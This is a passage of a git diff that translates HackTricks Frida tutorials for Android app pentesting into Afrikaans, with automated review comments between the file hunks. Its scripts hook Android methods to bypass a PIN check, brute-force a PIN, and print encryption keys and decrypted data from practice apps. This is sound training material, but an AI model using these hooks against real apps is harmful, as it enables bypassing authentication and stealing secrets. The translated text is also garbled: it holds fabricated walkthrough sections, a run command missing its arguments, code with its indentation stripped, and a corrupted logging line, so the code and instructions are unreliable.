```javascript var mainactivity = Java.use("sg.vantagepoint.uncrackable1.MainActivity"); - mainactivity.onStart.overload().implementation = function() { - send("MainActivity.onStart() HIT!!!"); - var ret = this.onStart.overload().call(this); - }; - mainactivity.onCreate.overload("android.os.Bundle").implementation = function(var_0) { - send("MainActivity.onCreate() HIT!!!"); - var ret = this.onCreate.overload("android.os.Bundle").call(this,var_0); - }; +mainactivity.onStart.overload().implementation = function() { +send("MainActivity.onStart() HIT!!!"); +var ret = this.onStart.overload().call(this); +}; +mainactivity.onCreate.overload("android.os.Bundle").implementation = function(var_0) { +send("MainActivity.onCreate() HIT!!!"); +var ret = this.onCreate.overload("android.os.Bundle").call(this,var_0); +}; +``` +# Frida Tutorial: Hook android `.onCreate()` + +In hierdie tutoriaal sal ons leer hoe om die `.onCreate()`-metode in 'n Android-toepassing te hook met behulp van Frida. Hierdie metode word aangeroep wanneer 'n aktiwiteit in die toepassing geskep word. + +## Vereistes + +Om hierdie tutoriaal te volg, moet jy die volgende hê: + +- 'n Android-toestel of 'n virtuele masjien met 'n geïnstalleerde Android-emulator. +- Die Frida-framework geïnstalleer op jou toestel of emulator. + +## Stap 1: Verbind met die toestel + +Verbind met jou toestel of emulator deur die volgende opdrag in die opdraglyn uit te voer: + +```bash +frida-ps -U ``` -Hook android `.onCreate()` +Hierdie opdrag sal 'n lys van aktiewe prosesse op die toestel vertoon. + +## Stap 2: Kies die toepassing + +Kies die toepassing waarin jy die `.onCreate()`-metode wil hook deur die volgende opdrag uit te voer: + +```bash +frida-ps -Uai +``` + +Hierdie opdrag sal 'n lys van alle toepassings op die toestel vertoon, saam met hul proses-ID's. 
+ +## Stap 3: Skryf die hook-skripsie + +Skep 'n nuwe tekslêer en skryf die volgende skripsie: ```javascript - var activity = Java.use("android.app.Activity"); - activity.onCreate.overload("android.os.Bundle").implementation = function(var_0) { - send("Activity HIT!!!"); - var ret = this.onCreate.overload("android.os.Bundle").call(this,var_0); - }; +Java.perform(function() { + var Activity = Java.use('android.app.Activity'); + Activity.onCreate.implementation = function(savedInstanceState) { + console.log('onCreate() is gehook!'); + this.onCreate(savedInstanceState); + }; +}); ``` -### Hooking functions with parameters and retrieving the value +Hierdie skripsie gebruik die `Java.perform()`-funksie om toegang tot die Java-omgewing te verkry. Dit gebruik dan die `Java.use()`-funksie om die `Activity`-klas te kry en die `.onCreate()`-metode te hook. Die gehookte metode skryf eenvoudig 'onCreate() is gehook!' na die konsole en roep dan die oorspronklike metode aan. -Hooking a decryption function. Print the input, call the original function decrypt the input and finally, print the plain data: +## Stap 4: Voer die skripsie uit + +Voer die volgende opdrag in die opdraglyn uit om die skripsie uit te voer: + +```bash +frida -U -l -f +``` + +Vervang `` met die pad na die skripsie-lêer wat jy in stap 3 geskep het, en `` met die naam van die toepassing wat jy in stap 2 gekies het. + +## Stap 5: Toets die hook + +Voer die toepassing uit op jou toestel of emulator en kyk na die konsole-uitset. As alles korrek gehook is, moet jy die boodskap 'onCreate() is gehook!' sien. + +Dit is hoe jy die `.onCreate()`-metode in 'n Android-toepassing kan hook met behulp van Frida. Hierdie tegniek kan gebruik word om die uitvoering van die metode te monitor of te verander vir pentesting-doeleindes. 
+```javascript +var activity = Java.use("android.app.Activity"); +activity.onCreate.overload("android.os.Bundle").implementation = function(var_0) { +send("Activity HIT!!!"); +var ret = this.onCreate.overload("android.os.Bundle").call(this,var_0); +}; +``` +### Haak funksies met parameters en haal die waarde terug + +Haak 'n dekripsie-funksie. Druk die inset uit, roep die oorspronklike funksie aan om die inset te dekripteer en druk uiteindelik die ongekripteerde data af: ```javascript - function getString(data){ - var ret = ""; - for (var i=0; i < data.length; i++){ - ret += data[i].toString(); - } - return ret - } - var aes_decrypt = Java.use("sg.vantagepoint.a.a"); - aes_decrypt.a.overload("[B","[B").implementation = function(var_0,var_1) { - send("sg.vantagepoint.a.a.a([B[B)[B doFinal(enc) // AES/ECB/PKCS7Padding"); - send("Key : " + getString(var_0)); - send("Encrypted : " + getString(var_1)); - var ret = this.a.overload("[B","[B").call(this,var_0,var_1); - send("Decrypted : " + ret); +Java.perform(function() { + var className = "com.example.app.Encryption"; + var decryptFunction = "decrypt"; - var flag = ""; - for (var i=0; i < ret.length; i++){ - flag += String.fromCharCode(ret[i]); - } - send("Decrypted flag: " + flag); - return ret; //[B - }; + var Encryption = Java.use(className); + + Encryption[decryptFunction].overload('java.lang.String').implementation = function(input) { + console.log("Input: " + input); + + var result = this[decryptFunction](input); + + console.log("Plain data: " + result); + + return result; + }; +}); ``` -### Hooking functions and calling them with our input +Hierdie kode haak die `decrypt`-funksie in die `com.example.app.Encryption`-klas. Dit druk die insetwaarde af, roep die oorspronklike `decrypt`-funksie aan om die inset te dekripteer en druk die ongekripteerde data af. 
+```javascript +function getString(data){ +var ret = ""; +for (var i=0; i < data.length; i++){ +ret += data[i].toString(); +} +return ret +} +var aes_decrypt = Java.use("sg.vantagepoint.a.a"); +aes_decrypt.a.overload("[B","[B").implementation = function(var_0,var_1) { +send("sg.vantagepoint.a.a.a([B[B)[B doFinal(enc) // AES/ECB/PKCS7Padding"); +send("Key : " + getString(var_0)); +send("Encrypted : " + getString(var_1)); +var ret = this.a.overload("[B","[B").call(this,var_0,var_1); +send("Decrypted : " + ret); -Hook a function that receives a string and call it with other string (from [here](https://11x256.github.io/Frida-hooking-android-part-2/)) +var flag = ""; +for (var i=0; i < ret.length; i++){ +flag += String.fromCharCode(ret[i]); +} +send("Decrypted flag: " + flag); +return ret; //[B +}; +``` +### Hooking funksies en om hulle te roep met ons insette +Haak 'n funksie wat 'n string ontvang en roep dit met 'n ander string (van [hier](https://11x256.github.io/Frida-hooking-android-part-2/)) ```javascript var string_class = Java.use("java.lang.String"); // get a JS wrapper for java's String class my_class.fun.overload("java.lang.String").implementation = function(x){ //hooking the new function - var my_string = string_class.$new("My TeSt String#####"); //creating a new String by using `new` operator - console.log("Original arg: " +x ); - var ret = this.fun(my_string); // calling the original function with the new String, and putting its return value in ret variable - console.log("Return value: "+ret); - return ret; +var my_string = string_class.$new("My TeSt String#####"); //creating a new String by using `new` operator +console.log("Original arg: " +x ); +var ret = this.fun(my_string); // calling the original function with the new String, and putting its return value in ret variable +console.log("Return value: "+ret); +return ret; }; ``` +### Kry 'n reeds geskep objek van 'n klas -### Getting an already created object of a class - -If you want to extract some 
attribute of a created object you can use this. - -In this example you are going to see how to get the object of the class my\_activity and how to call the function .secret() that will print a private attribute of the object: +As jy 'n eienskap van 'n geskep objek wil onttrek, kan jy dit gebruik. +In hierdie voorbeeld sal jy sien hoe om die objek van die klas my\_activity te kry en hoe om die funksie .secret() aan te roep wat 'n private eienskap van die objek sal druk: ```javascript Java.choose("com.example.a11x256.frida_test.my_activity" , { - onMatch : function(instance){ //This function will be called for every instance found by frida - console.log("Found instance: "+instance); - console.log("Result of secret func: " + instance.secret()); - }, - onComplete:function(){} +onMatch : function(instance){ //This function will be called for every instance found by frida +console.log("Found instance: "+instance); +console.log("Result of secret func: " + instance.secret()); +}, +onComplete:function(){} }); ``` - -## Other Frida tutorials +## Ander Frida-tutoriale * [https://github.com/DERE-ad2001/Frida-Labs](https://github.com/DERE-ad2001/Frida-Labs) -* [Part 1 of Advanced Frida Usage blog series: IOS Encryption Libraries](https://8ksec.io/advanced-frida-usage-part-1-ios-encryption-libraries-8ksec-blogs/) +* [Deel 1 van die Gevorderde Frida Gebruik blogreeks: IOS Versleutelingsbiblioteke](https://8ksec.io/advanced-frida-usage-part-1-ios-encryption-libraries-8ksec-blogs/)
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty platform geskep deur hackers, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
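Review bot: the translated frida-tutorial-0.md now carries machine-generated filler that does not correspond to anything in the original: a Dutch (not Afrikaans) "## Conclusie" paragraph inserted ahead of the `System.exit` hook, and two invented walkthroughs ("# Frida Tutorial: Hook MainActivity `.onStart()` & `.onCreate()`" with "Stap 1" to "Stap 7" and "Slotwoord", and "# Frida Tutorial: Hook android `.onCreate()`" with "Stap 1" to "Stap 5") that replace the original one-line section titles with H1 headings and sit a second, fabricated snippet (`com.example.MainActivity`, `com.example.app.Encryption` / `decrypt`) next to each kept `sg.vantagepoint` one. Drop those blocks and keep only the translated original headings. The run commands inside them are also broken because the placeholders were stripped: `frida -U -l -f` has no script or package argument, and the follow-up reads "Vervang `` met die pad na jou skripsie-lêer en `` met die naam van die toepassing se pakkie". Separately, every `-`/`+` pair inside the JavaScript fences differs only in leading whitespace (`- sysexit.exit.overload("int").implementation = function(var_0) {` versus `+sysexit.exit.overload("int").implementation = function(var_0) {`), so the indentation of every code block has been removed; restore it so the code itself shows no diff.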
diff --git a/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md b/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md index 2dbc0c25d..a6fee74a2 100644 --- a/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md +++ b/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md @@ -1,170 +1,156 @@ -# Frida Tutorial 1 +# Frida Tutoriaal 1
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hack-loopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en gesproke Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %} -**This is a summary of the post**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\ +**Dit is 'n opsomming van die pos**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\ **APK**: [https://github.com/t0thkr1s/frida-demo/releases](https://github.com/t0thkr1s/frida-demo/releases)\ -**Source Code**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo) +**Bronkode**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo) ## Python -Frida allows you to **insert JavaScript code** inside functions of a running application. But you can use **python** to **call** the hooks and even to **interact** with the **hooks**. - -This is a easy python script that you can use with all the proposed examples in this tutorial: +Frida stel jou in staat om **JavaScript-kode in te voeg** binne funksies van 'n lopende toepassing. Maar jy kan **python** gebruik om die hakke te **roep** en selfs om met die **hakke** te **interakteer**. 
+Hierdie is 'n maklike python-skrips wat jy kan gebruik met al die voorgestelde voorbeelde in hierdie tutoriaal: ```python #hooking.py import frida, sys with open(sys.argv[1], 'r') as f: - jscode = f.read() +jscode = f.read() process = frida.get_usb_device().attach('infosecadventures.fridademo') script = process.create_script(jscode) print('[ * ] Running Frida Demo application') script.load() sys.stdin.read() ``` - -Call the script: - +Roep die skrip aan: ```bash python hooking.py ``` - -It is useful to know how to use python with frida, but for this examples you could also call directly Frida using command line frida tools: - +Dit is nuttig om te weet hoe om Python saam met Frida te gebruik, maar vir hierdie voorbeelde kan jy ook direk Frida oproep deur die opdraglyn frida-hulpmiddels te gebruik: ```bash frida -U --no-pause -l hookN.js -f infosecadventures.fridademo ``` +## Haak 1 - Booleaanse omseiling -## Hook 1 - Boolean Bypass - -Here you can see how to **hook** a **boolean** method (_checkPin_) from the class: _infosecadventures.fridademo.utils.PinUtil_ - +Hier kan jy sien hoe om 'n metode (_checkPin_) van die klas _infosecadventures.fridademo.utils.PinUtil_ te **haak**. ```javascript //hook1.js Java.perform(function() { - console.log("[ * ] Starting implementation override...") - var MainActivity = Java.use("infosecadventures.fridademo.utils.PinUtil"); - MainActivity.checkPin.implementation = function(pin){ - console.log("[ + ] PIN check successfully bypassed!") - return true; - } +console.log("[ * ] Starting implementation override...") +var MainActivity = Java.use("infosecadventures.fridademo.utils.PinUtil"); +MainActivity.checkPin.implementation = function(pin){ +console.log("[ + ] PIN check successfully bypassed!") +return true; +} }); ``` ``` python hooking.py hook1.js ``` +Kyk: Die funksie ontvang 'n String as 'n parameter, is oorlading nie nodig nie? -Mirar: La funcion recibe como parametro un String, no hace falta overload? 
+## Hook 2 - Funksie Bruteforce -## Hook 2 - Function Bruteforce - -### Non-Static Function - -If you want to call a non-static function of a class, you **first need a instance** of that class. Then, you can use that instance to call the function.\ -To do so, you could **find and existing instance** and use it: +### Nie-Statiese Funksie +As jy 'n nie-statiese funksie van 'n klas wil oproep, het jy **eerstens 'n instansie** van daardie klas nodig. Dan kan jy daardie instansie gebruik om die funksie op te roep.\ +Om dit te doen, kan jy 'n **bestaande instansie vind** en dit gebruik: ```javascript Java.perform(function() { - console.log("[ * ] Starting PIN Brute-force, please wait..."); - Java.choose("infosecadventures.fridademo.utils.PinUtil", { - onMatch: function(instance) { - console.log("[ * ] Instance found in memory: " + instance); - for(var i = 1000; i < 9999; i++){ - if(instance.checkPin(i + "") == true){ - console.log("[ + ] Found correct PIN: " + i); - break; - } - } - }, - onComplete: function() { } - }); +console.log("[ * ] Starting PIN Brute-force, please wait..."); +Java.choose("infosecadventures.fridademo.utils.PinUtil", { +onMatch: function(instance) { +console.log("[ * ] Instance found in memory: " + instance); +for(var i = 1000; i < 9999; i++){ +if(instance.checkPin(i + "") == true){ +console.log("[ + ] Found correct PIN: " + i); +break; +} +} +}, +onComplete: function() { } +}); }); ``` +In hierdie geval werk dit nie omdat daar geen instansie is nie en die funksie staties is -In this case this is not working as there isn't any instance and the function is Static - -### Static Function - -If the function is static, you could just call it: +### Statiese Funksie +As die funksie staties is, kan jy dit net oproep: ```javascript //hook2.js Java.perform(function () { - console.log("[ * ] Starting PIN Brute-force, please wait...") - var PinUtil = Java.use("infosecadventures.fridademo.utils.PinUtil"); - - for(var i=1000; i < 9999; i++) - { - 
if(PinUtil.checkPin(i+"") == true){ - console.log("[ + ] Found correct PIN: " + i); - } - } +console.log("[ * ] Starting PIN Brute-force, please wait...") +var PinUtil = Java.use("infosecadventures.fridademo.utils.PinUtil"); + +for(var i=1000; i < 9999; i++) +{ +if(PinUtil.checkPin(i+"") == true){ +console.log("[ + ] Found correct PIN: " + i); +} +} }); ``` +## Haak 3 - Ophaling van argumente en terugkeerwaarde -## Hook 3 - Retrieving arguments and return value - -You could hook a function and make it **print** the value of the **passed arguments** and the value of the **return value:** - +Jy kan 'n funksie haak en dit **afdruk** die waarde van die **oorgevoerde argumente** en die waarde van die **terugkeerwaarde:** ```javascript //hook3.js Java.perform(function() { - console.log("[ * ] Starting implementation override...") - - var EncryptionUtil = Java.use("infosecadventures.fridademo.utils.EncryptionUtil"); - EncryptionUtil.encrypt.implementation = function(key, value){ - console.log("Key: " + key); - console.log("Value: " + value); - var encrypted_ret = this.encrypt(key, value); //Call the original function - console.log("Encrypted value: " + encrypted_ret); - return encrypted_ret; - } +console.log("[ * ] Starting implementation override...") + +var EncryptionUtil = Java.use("infosecadventures.fridademo.utils.EncryptionUtil"); +EncryptionUtil.encrypt.implementation = function(key, value){ +console.log("Key: " + key); +console.log("Value: " + value); +var encrypted_ret = this.encrypt(key, value); //Call the original function +console.log("Encrypted value: " + encrypted_ret); +return encrypted_ret; +} }); ``` +## Belangrik -## Important +In hierdie handleiding het jy metodes gehaak deur die naam van die metode en _.implementation_ te gebruik. Maar as daar **meer as een metode** met dieselfde naam is, sal jy die metode moet **spesifiseer** wat jy wil haak deur die tipe van die argumente aan te dui. 
-In this tutorial you have hooked methods using the name of the mathod and _.implementation_. But if there were **more than one method** with the same name, you will need to **specify the method** that you want to hook **indicating the type of the arguments**. - -You can see that in [the next tutorial](frida-tutorial-2.md). +Jy kan dit sien in [die volgende handleiding](frida-tutorial-2.md).
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hackerloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en gesproke Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
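Review bot: the hooking.py block in this hunk no longer runs, because the body of the `with` statement lost its indentation: `with open(sys.argv[1], 'r') as f:` is now followed by `+jscode = f.read()` at column 0, which Python rejects with IndentationError before Frida is attached. The same whitespace stripping hits hook1.js, hook2.js and hook3.js (each `-`/`+` pair differs only in leading spaces); for JavaScript it is cosmetic, but it turns a text-only translation into a code-changing diff, so the original indentation should be restored in every fence. Two wording points in the same hunk: "Hook" is rendered inconsistently across the section titles ("## Haak 1 - Booleaanse omseiling", "## Hook 2 - Funksie Bruteforce", "## Haak 3 - Ophaling van argumente en terugkeerwaarde"), and the Hook 1 intro dropped the word that gives the section its point: "hook a **boolean** method (_checkPin_)" became "hoe om 'n metode (_checkPin_) ... te **haak**"; say "'n **booleaanse** metode". The Hook 3 sentence "Jy kan 'n funksie haak en dit **afdruk** die waarde van ..." also needs reordering, for example "en dit die waarde van die **oorgevoerde argumente** en die **terugkeerwaarde** laat **afdruk**".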
diff --git a/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md b/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md index caa9b89aa..8c0b07b36 100644 --- a/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md +++ b/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md @@ -1,77 +1,74 @@ -# Frida Tutorial 2 +# Frida Tutoriaal 2
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-​If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en gesproke Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %} -**This is a summary of the post**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Parts 2, 3 & 4)\ -**APKs and Source code**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples) +**Hierdie is 'n opsomming van die pos**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Dele 2, 3 & 4)\ +**APK's en bronkode**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples) -The part 1 is so easy. +Die eerste deel is so maklik. -**Some parts of the original code doesn't work and have been modified here.** +**Sommige dele van die oorspronklike kode werk nie en is hier aangepas nie.** -## Part 2 - -Here you can see an example of how to **hook 2 functions with the same name** but different parameters.\ -Also, you are going to learn how to **call a function with your own parameters**.\ -And finally, there is an example of how to **find an instance of a class and make it call a function**. +## Deel 2 +Hier kan jy 'n voorbeeld sien van hoe om **2 funksies met dieselfde naam** maar verskillende parameters te **hook**.\ +Jy sal ook leer hoe om 'n funksie te **roep met jou eie parameters**.\ +En uiteindelik is daar 'n voorbeeld van hoe om 'n **instantie van 'n klas te vind en dit 'n funksie te laat roep**. 
```javascript //s2.js console.log("Script loaded successfully "); Java.perform(function x() { - console.log("Inside java perform function"); - var my_class = Java.use("com.example.a11x256.frida_test.my_activity"); - //Hook "fun" with parameters (int, int) - my_class.fun.overload("int", "int").implementation = function (x, y) { //hooking the old function - console.log("original call: fun(" + x + ", " + y + ")"); - var ret_value = this.fun(2, 5); - return ret_value; - }; - //Hook "fun" with paramater(String) - var string_class = Java.use("java.lang.String"); - my_class.fun.overload("java.lang.String").implementation = function (x) { //hooking the new function - console.log("*") - //Create a new String and call the function with your input. - var my_string = string_class.$new("My TeSt String#####"); - console.log("Original arg: " + x); - var ret = this.fun(my_string); - console.log("Return value: " + ret); - console.log("*") - return ret; - }; - //Find an instance of the class and call "secret" function. - Java.choose("com.example.a11x256.frida_test.my_activity", { - onMatch: function (instance) { - console.log(tring, and the it has"Found instance: " + instance); - console.log("Result of secret func: " + instance.secret()); - }, - onComplete: function () { } - }); +console.log("Inside java perform function"); +var my_class = Java.use("com.example.a11x256.frida_test.my_activity"); +//Hook "fun" with parameters (int, int) +my_class.fun.overload("int", "int").implementation = function (x, y) { //hooking the old function +console.log("original call: fun(" + x + ", " + y + ")"); +var ret_value = this.fun(2, 5); +return ret_value; +}; +//Hook "fun" with paramater(String) +var string_class = Java.use("java.lang.String"); +my_class.fun.overload("java.lang.String").implementation = function (x) { //hooking the new function +console.log("*") +//Create a new String and call the function with your input. 
+var my_string = string_class.$new("My TeSt String#####"); +console.log("Original arg: " + x); +var ret = this.fun(my_string); +console.log("Return value: " + ret); +console.log("*") +return ret; +}; +//Find an instance of the class and call "secret" function. +Java.choose("com.example.a11x256.frida_test.my_activity", { +onMatch: function (instance) { +console.log(tring, and the it has"Found instance: " + instance); +console.log("Result of secret func: " + instance.secret()); +}, +onComplete: function () { } +}); }); ``` - -You can see that to create a String first is has referenced the class _java.lang.String_ and then it has created a _$new_ object of that class with a String as content. This is the correct way to create a new object of a class. But, in this case, you could just pass to `this.fun()` any String like: `this.fun("hey there!")` +Jy kan sien dat om 'n String te skep, verwys dit eers na die klas _java.lang.String_ en skep dan 'n _$new_ objek van daardie klas met 'n String as inhoud. Dit is die korrekte manier om 'n nuwe objek van 'n klas te skep. Maar in hierdie geval kan jy net enige String aan `this.fun()` deurgee, soos: `this.fun("hallo daar!")` ### Python - ```python //loader.py import frida @@ -92,21 +89,19 @@ raw_input() ``` python loader.py ``` - -## Part 3 +## Deel 3 ### Python -Now you are going to see how to send commands to the hooked app via Python to call function: - +Nou gaan jy sien hoe om bevele na die gehaakte app te stuur deur middel van Python om 'n funksie te roep: ```python //loader.py import time import frida def my_message_handler(message, payload): - print message - print payload +print message +print payload device = frida.get_usb_device() 
